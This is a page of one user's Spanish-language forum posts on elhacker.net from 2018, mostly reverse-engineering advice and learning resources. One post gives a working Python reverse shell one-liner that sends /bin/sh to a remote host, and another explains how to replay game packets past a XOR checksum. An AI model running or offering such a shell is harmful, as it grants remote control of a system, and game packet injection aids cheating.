elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 313
31  Programación / Ingeniería Inversa / Re: Resetear PERÍODO DE PRUEBA de software...Imposible??? en: 5 Agosto 2018, 07:39 am
Ya intenté usarlo en una máquina virtual y no funciona ya que necesita usar una GPU dedicada con opencl

PD: POR QUE INTENTAS ENVIARME UN MALWARE??!!!!



Si te fijas el sitio es clasificado como un sitio de malicioso no propiamente el .doc. De todas maneras el sitio es administrado por ricardo narvaja una persona que ha ayudado a muchos a iniciarse en el reversing, es más puedes buscar sobre él, te darás cuenta que todo esto es un mal entendido. Es más para que hablar de Apuromafo, alguien experto durante años en el reversing  :D
32  Programación / Ingeniería Inversa / Re: W32 DASM en: 23 Julio 2018, 22:02 pm
Para Delphi puedes suar DeDe
33  Programación / Ingeniería Inversa / Re: El nuevo o el viejo? en: 13 Julio 2018, 16:07 pm
El tutorial de OllyDbg cubre todo lo necesario como introducción para reversing desde 0, a diferencia el tutorial de IDA tiene un enfoque netamente con el funcionamiento de esta , aun cuando se explican bases de reversing no son tan sólidas como las de OllyDbg, creo que mi sugerencia es la siguiente:
- Intro a OllyDbg por Ric
- Intro a x64Dbg curso raton por Apuromafo
- Intro reversing con IDA por Ric (primeros cap)

Si quieres introducirte en el mundo del exploiting:
- Corelan tutoriales traducidos por Ivinson
- Shellcoders handbook
- Resto de intro reversing con IDA
34  Programación / Ingeniería Inversa / Re: decompilar DLLs en: 12 Julio 2018, 23:48 pm
Puff no hay quien haga ingeniería inversa de este software, estamos un amigo y yo que nos está costando la misma vida......y eso que tengo licencia de un mes de prueba..

Nadie está obligado a hacer ingeniería inversa a algo que para ti tiene valor y lo más probable es que para el resto NO. Tampoco estás pidiendo ayuda, estás pidiendo un trabajo realizado. Que lamentable que si llevas dos días, una semana o un mes te esté costando la vida, pues de ser así, estoy en deuda con mi vida, llevo al menos 8 años en reversing y no me ando quejando cuando algo se me hace difícil, más bien aporto con lo que he podido encontrar y con BASES pido ayuda.

Es fácil pedir limosna sin hacer nada, pero es más difícil pedir algo puntual una vez que te hayas ESFORZADO.

Con esa actitud, lo más lejos que llegarán tu y tu amigo es a un tacho de basura, pues en el mundo que vivimos dos días de "esfuerzo" no es NADA.
35  Programación / Ingeniería Inversa / Re: Creación de BOT para World of Warcraft en: 10 Julio 2018, 14:38 pm
Excelente aporte, ideal para aquellos que siempre solicitan en el foro ayuda con los hackeos de juegos, un buen punto de inicio  ::)
36  Programación / Scripting / Re: [PYTHON] Stream cmd con socket en: 10 Junio 2018, 04:27 am
Reverse Shell en Python testeado en sistema Linux:

Código
  1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
37  Programación / Ingeniería Inversa / Re: Main.exe "Mu online" se congela al atacar con OLLYDBG en: 21 Mayo 2018, 01:25 am
Tuve un servidor MU Online durante bastante tiempo, por lo que comentas, este no está protegido, pues al parecer puedes visualizar las strings. Déjame decirte que lo único que puedes hacer con esto es modificar tu cliente de forma local, todo cambio que realices es sólo de forma local y en ningún momento afectará el servidor. Lo que debes hacer es interceptar los paquetes e intentar replicarlo por medio de WPE Pro, lo que sí tienes que lidiar es que los paquetes tienen una especie de checksum que si no lo logras descifrar (es un proceso reversible por medio de XOR) te detectarán la inyección de envío de paquetes, saludos
38  Seguridad Informática / Análisis y Diseño de Malware / Re: Sospecha de malware en foto de Whatsapp y Gmail en: 17 Mayo 2018, 18:19 pm
No se puede dejar de lado la posibilidad de ataques tipo RCE en donde por lo general, basta con hacer que el usuario visite algún enlace, o saber su IP para desencadenar la ejecución de código remotamente como un RAT, pero este tipo de ataques son más sofisticados y son realizados por personas que poseen una amplia experiencia en el área de exploiting y especializados específicamente en arquitecturas ARM y puntualmente en Android y Android Internals, son profesionales del oficio pero en sí que uno de ellos te quiera infectar el Android lo podrá conseguir, quizás en semanas, meses pero esto se da más en espionaje en personas consideradas como NO normales, políticos, millonarios, etc. Por lo cual, si tienes un Android y $ promedio, no deberías preocuparte.
39  Programación / .NET (C#, VB.NET, ASP) / Re: Ejecutar programa mediante esto. en: 15 Mayo 2018, 14:38 pm
Yo le entendí, quiere crear un ejecutable y en base a sus valores hexadecimales del PE, por medio de otro programa, ejecutar el programa.

Eso no es posible, así como así, pues internamente los programas realizan una serie de inicializaciones que copiando y pegando no funcionará.

Debes buscar por shellcode, que es una serie de valores hexadecimales que funcionan de forma autónoma dentro de cualquier ejecutable.

PD: Partiendo por que los .net genera MSIL, lo que pides es difícil.
40  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Warzone caído en: 13 Mayo 2018, 19:09 pm
Más que caído el problema es el registro, el captcha está desactualizado. Por otro lado también hay varios retos que redireccionan al blog, lo cual imposibilita desarrollarlos.

Creo que el-brujo debería reparar este tipo de problemas, pues por lo que tengo entendido, está fuera del alcance del staff

Saludos
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 313
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines